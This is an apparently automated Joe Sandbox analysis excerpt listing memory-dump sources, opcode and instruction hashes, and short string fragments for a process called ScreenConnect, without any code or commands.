                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d56df42f1dd80af314baa5b9d3c7dfc53b02aba2996be6fb87677749bcd705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF1C130A0CE868FEBA9FF2884556B977E1FF95384F55097DD04DC7292DE2CA8029B41

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: bH$ bH$ bH
                                                                                                                                                                                                                                          • API String ID: 0-3431803290
                                                                                                                                                                                                                                          • Opcode ID: 88d1f51b28ba68975d0443d6508bed7b3c233c26f7ea9b4b03318f6beaed267c
                                                                                                                                                                                                                                          • Instruction ID: 599e0af714ec6e56a13a0589750a01010f756c3f0a57bbec7fb33bd19d538304
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88d1f51b28ba68975d0443d6508bed7b3c233c26f7ea9b4b03318f6beaed267c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE12F131A1CA8E8FE7A9FA2C94556F437D1FF69380F4540B9D44EC7297DE28E8428760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8Y I$@hH
                                                                                                                                                                                                                                          • API String ID: 0-4237702953
                                                                                                                                                                                                                                          • Opcode ID: bada670e1af6b1b112ea3f27df3144f87993bc86bf867a392445177e65d5e89b
                                                                                                                                                                                                                                          • Instruction ID: 16431f7458a71bcb0fb732e727cf6fa5a576f3268f21db9c18eb8d72fc4bfa13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bada670e1af6b1b112ea3f27df3144f87993bc86bf867a392445177e65d5e89b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D518621E1DACA0FE7A5FA3854560F87BE1FF95280B1901FAC09DC7187DD1DA806C781

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3291653084.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848e70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                          • Opcode ID: 94f444be349e4fecb562f899c2ee173129c3e9e64c9dce0c2c03b35044ea77a3
                                                                                                                                                                                                                                          • Instruction ID: a2f474b63aef2c3eb11d8a094b34681f26f0194cddb754c829b3e4f2cc1ae145
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94f444be349e4fecb562f899c2ee173129c3e9e64c9dce0c2c03b35044ea77a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4514931D1CB584FD718AF689C4A5E97BE0EF55361F04027EE049C3192DF78A846C795
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b1be42bd27a54fc4bd5fdc5ce7f5c85bf47cf30eb8328e3a7fafd1215959707f
                                                                                                                                                                                                                                          • Instruction ID: 91ed95b7d0f0614b801ae9ce920714e68c136a26664235a4a46b301ee97a3f13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1be42bd27a54fc4bd5fdc5ce7f5c85bf47cf30eb8328e3a7fafd1215959707f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C91273290DACB5FE778FA2894514B573E1FF65790B1501BDC44E875C6EE2DB80A8B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2e1d302cff9014ddaaeb25542aa9aabf9631b30e0edec7496694134972267e92
                                                                                                                                                                                                                                          • Instruction ID: 04a5ddb28259a4043cf6832bc05f7d7f01296e224d2f28ca3a1b7f12d50e9ba1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e1d302cff9014ddaaeb25542aa9aabf9631b30e0edec7496694134972267e92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A819130A1DE8B8EE7A9FE3844152B976D2FF953C4F550878D05EC72C2EE2DB8059A41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3956b615fcb5dc9a98529015f886bf8886cf87e6eeea8267d2a267143b707ea1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11BF3061C9484FE794FE28D4986B6B3E2FBD8355F14057ED84EC76A5DE6AAC80CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d8ad06bd060150af9ac295b11326e5979b69f03ad4a61845468dc39ea7704afe
                                                                                                                                                                                                                                          • Instruction ID: e20782b637d29a8519232951d5bdc86d694232e5e01b13f81bf3085b0510f378
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8ad06bd060150af9ac295b11326e5979b69f03ad4a61845468dc39ea7704afe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811B171E0DB898FEFA5EF6858650A83FA1FF55340F0600EAD449C3296DE78A800CB02
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca70605fd984ea13d58d33a046a4325c48561046274796ac8c16dd75ff508811
                                                                                                                                                                                                                                          • Instruction ID: c2579abbae620564b94947c2965921ece9bf6722f5af81da0619e59bbde1ef56
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca70605fd984ea13d58d33a046a4325c48561046274796ac8c16dd75ff508811
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6115E31E0C98A8FDB99EF188450B6577E1FF68784F0544B9C44EDB287DE39E8468B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6198890387df0dfeac7ccc4d17ce62788c22d2fefb66dfd6e3048520b370190a
                                                                                                                                                                                                                                          • Instruction ID: b5edbb9edbc0fd79f3a79ab720e3cb8510622c1de2b4b7c28706a636e52905e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6198890387df0dfeac7ccc4d17ce62788c22d2fefb66dfd6e3048520b370190a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9115E31E0898A8FDB99EF188050B6177A1FF68784B0544A9C44EDB287DA39E8468B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cedc9e57bf9837b34474f42336ec3cd06a856b197ce9ba6cc48f64bdff06ccdd
                                                                                                                                                                                                                                          • Instruction ID: 932f8fb9977cc2f50085f3e2e03631820fa5605f6209bb6a563217f6ac0e3673
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cedc9e57bf9837b34474f42336ec3cd06a856b197ce9ba6cc48f64bdff06ccdd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001D412A5CA860EFAA5B52C3D152F817A0DF952A1F4910B7DC4CC6196EA0C5CC703C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 726357270637d76528c4ed6f75c341dfc50ae1b9c154cc2a8e61ca95b10f4c3f
                                                                                                                                                                                                                                          • Instruction ID: a3d6f68c95d7d310b82d62f5ca24ca468c52ebe8a62e69bf406d0e4e5d8c7d49
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726357270637d76528c4ed6f75c341dfc50ae1b9c154cc2a8e61ca95b10f4c3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11CCB284D8596ED718FB6CE4518F97360FF11398F1C9272D04D8A053EF15B8458E95
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b9fbe5b4dc8db46f2ab2628b735202c5f31f93b0f5bce3d9de272a6b9a80b8a2
                                                                                                                                                                                                                                          • Instruction ID: ac570251a61e2b834aa89780ad6a3a5bc2f51398f23a94e563767ca07f63d4ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9fbe5b4dc8db46f2ab2628b735202c5f31f93b0f5bce3d9de272a6b9a80b8a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501F91990DA878FF7B4F72480603B566D2AF953C4F1A907AC40DC61D6DD2D9C869A40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 13eb64c50aaf4eb972e86ed65eb4395be05eb47b7ac6b3f6a1f404d8bd7573e6
                                                                                                                                                                                                                                          • Instruction ID: c074f58a4cba11bc7b35b7cb1cb867d69afb818586203512f4842482ea71c969
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13eb64c50aaf4eb972e86ed65eb4395be05eb47b7ac6b3f6a1f404d8bd7573e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101A231E1CA878EFAF8ED0844816B423D5FB583C4F5540B4C44ED72CACE2CAC019A81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 74d50a942488569d1b7ff7a02cb49a1af428a4904ac505f17f9bf418fb28d53f
                                                                                                                                                                                                                                          • Instruction ID: 1348dc458d7c1c5657373bfad1b41b12d73a7bd3bf27d3ec8fa7ccd81786b727
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74d50a942488569d1b7ff7a02cb49a1af428a4904ac505f17f9bf418fb28d53f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101FF30E5DA875DFEB9FE1440A1AB81291EF553C5F8544B8D84FCA1C7CE3CA805AA51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae226732b56fc8cdcd27f508067c20d5bfb58bcd9cbc6b86a5f72f9156e81f78
                                                                                                                                                                                                                                          • Instruction ID: 945d44f569607c52bee9726b5ff989cfa0e6e844177d1207aef492bf6a4a53b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae226732b56fc8cdcd27f508067c20d5bfb58bcd9cbc6b86a5f72f9156e81f78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0A07180894D9FCB19EA28E4548E6B760FF26304B0641A6E04DC7052DA21AD54CFC2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5b84792d3b85a624d3c3f2ad849a6eb4b5c8a7cb50fd8d8ea5916627b1d6786b
                                                                                                                                                                                                                                          • Instruction ID: 80c4ecd18a26d546a7a023039c757baf4025386160bbab3b15bb1caf7f0f087a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b84792d3b85a624d3c3f2ad849a6eb4b5c8a7cb50fd8d8ea5916627b1d6786b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0E20590E7D30EE72A623518602707FA09F53280F0E40FBC099CA0D7EC4C48868712
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d58af4ecd7bf95eb0eb8fb30d62dba388c4a4779baa5a7ace90b7fe574ce0cf6
                                                                                                                                                                                                                                          • Instruction ID: 7cecef0614cdbff638e74b279cac5ffea62a243cd608fc24b011a52789262847
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d58af4ecd7bf95eb0eb8fb30d62dba388c4a4779baa5a7ace90b7fe574ce0cf6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E0D86150E7D40FD756EF3884988E13F50ED5321034901EBE4858F0B3E5148A49C751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 924660bcb0da36e6c3f5ad0b254056c07a816402a9e5c19a7381f77dcbf990bb
                                                                                                                                                                                                                                          • Instruction ID: 0b6e17cfaff797274adc576ad2cc300f8a58c9a8c69a1f426df01e38c9b6c79b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924660bcb0da36e6c3f5ad0b254056c07a816402a9e5c19a7381f77dcbf990bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF0E53540DACC8FCB82EB64D4648D57FB0FF56320B0501CBE048CB053E7209A59CB82
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d683f3165337edba7af4594d20b7323dbff62861b2412c856a3e397d99e9fbd
                                                                                                                                                                                                                                          • Instruction ID: af5650c9447589c2d1879fb220b4f1c91f9abffa0dec18f7d4868750cb90fb1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d683f3165337edba7af4594d20b7323dbff62861b2412c856a3e397d99e9fbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E0DF31A0CA8D8FDB54EAA4A8002A573A0FB08308F0505A9E81DC3191D7B96A50CB02
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 552ae35ba6e1dbaef25a825ea541d2b98c9a79956b649dc295e874716f931eb6
                                                                                                                                                                                                                                          • Instruction ID: c7b59613a2c53343b559a17503cb248999c002f8e341eed84c07fa3f20b76e11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 552ae35ba6e1dbaef25a825ea541d2b98c9a79956b649dc295e874716f931eb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE0C21594D9A30AFB7CB57578513B560C1AF493C1F0A907A941DC14C9ED5C9C825986
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6f58bb300433c6409340e1f60fe11e537ea8c65e8b6489bc235ab011fe8bc6cf
                                                                                                                                                                                                                                          • Instruction ID: 91129688c1616527163444bec82dc98d7fb1c34dfc2e6be23b6b0b0d29e71c74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f58bb300433c6409340e1f60fe11e537ea8c65e8b6489bc235ab011fe8bc6cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6E0DF60E1DECA8FE69AFA2444019797291FF64284F5845B9C84AA7187DE28A8058781
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c0236df8534d8ce9b9fa56c92c07cef367af125345209f86e0954ca5e1b27226
                                                                                                                                                                                                                                          • Instruction ID: d6d0d142a52482b0e9677ee64568a5b0ccac72f4e6322dc8a771fa549d92a03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0236df8534d8ce9b9fa56c92c07cef367af125345209f86e0954ca5e1b27226
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDC09210F0CA8A9FF265FB2544516BF11E27F8C2C4F618931E80EC2186CE3CA502A609
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Xg I$`f I$`f I$h I
                                                                                                                                                                                                                                          • API String ID: 0-3707605622